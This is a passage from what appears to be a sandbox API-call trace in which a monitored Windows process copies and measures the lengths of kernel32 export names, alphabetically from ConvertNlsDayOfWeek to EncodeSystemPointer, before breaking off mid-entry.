[0083.937] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.937] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.937] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.938] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.938] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.938] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.938] lstrlenA (lpString="COPYFILEA") returned 9 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.938] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.938] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.938] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.938] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.938] lstrlenA (lpString="COPYFILEW") returned 9 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.938] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.938] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.938] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.938] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.938] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.938] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.938] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.938] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.938] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.938] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.938] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.939] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.939] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.939] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.939] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.939] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.939] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.939] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.939] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.939] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.939] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.939] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.939] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.939] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.939] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.939] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.939] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.939] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.939] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.939] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.940] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.940] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.940] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.940] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.940] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.940] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.940] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.940] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.940] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.940] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.940] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.940] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.940] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.940] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.940] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.940] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.940] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.940] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.941] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.941] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.941] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.941] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.941] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.941] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.941] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.941] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.941] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.941] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.941] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.941] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.941] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.941] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.941] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.941] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.941] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.941] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.941] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.941] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.942] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.942] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.942] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.942] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.942] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.942] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.942] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.942] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.942] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.942] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.942] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.942] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.942] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.942] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.942] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.942] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.942] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.942] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.942] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.943] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.943] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.943] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.943] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.943] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.943] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.943] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.943] lstrlenA (lpString="DELETEATOM") returned 10 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.943] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.943] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.943] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.943] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.943] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.943] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.943] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.943] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.943] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.943] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.943] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.943] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.944] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.944] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.944] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.944] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.944] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.944] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.944] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.944] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.944] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.944] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.944] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.944] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.944] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.944] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.944] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.944] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: 